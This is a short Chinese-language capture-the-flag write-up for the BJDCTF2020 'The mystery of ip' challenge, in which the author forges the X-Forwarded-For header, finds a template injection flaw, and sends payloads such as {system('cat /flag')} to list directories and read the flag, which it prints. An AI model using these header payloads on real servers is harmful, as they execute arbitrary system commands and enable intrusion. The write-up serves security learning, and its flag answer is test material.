[BJDCTF2020]The mystery of ip 1

[BJDCTF2020]The mystery of ip 1

打开实例,发现flag.php路径,访问显示自己当前的内网ip

image-20241124091805543

hackerbar添加xff请求头,尝试ip伪造,成功回显

image-20241124091858569

判断可能为xff注入,尝试sql的部分注入语句均无效,放弃sql注入,尝试SSTI模板注入

X-Forwarded-For: {1+1}

image-20241124092302520

成功回显,存在XFF-SSTI模板注入漏洞

尝试构造payload

X-Forwarded-For: {system("ls")}

image-20241124092406046

成功遍历目录

查看flag.php,未发现flag

image-20241124092536880

查看根目录

X-Forwarded-For: {system("ls / -a")}

image-20241124092622528

发现flag,最终payload为:

X-Forwarded-For: {system("cat /flag")}

image-20241124092700153

flag{b0a840de-eeaf-4ed1-80c1-bb12ff2bcb10} 
posted @   TazmiDev  阅读(38)  评论(0编辑  收藏  举报
点击右上角即可分享
微信分享提示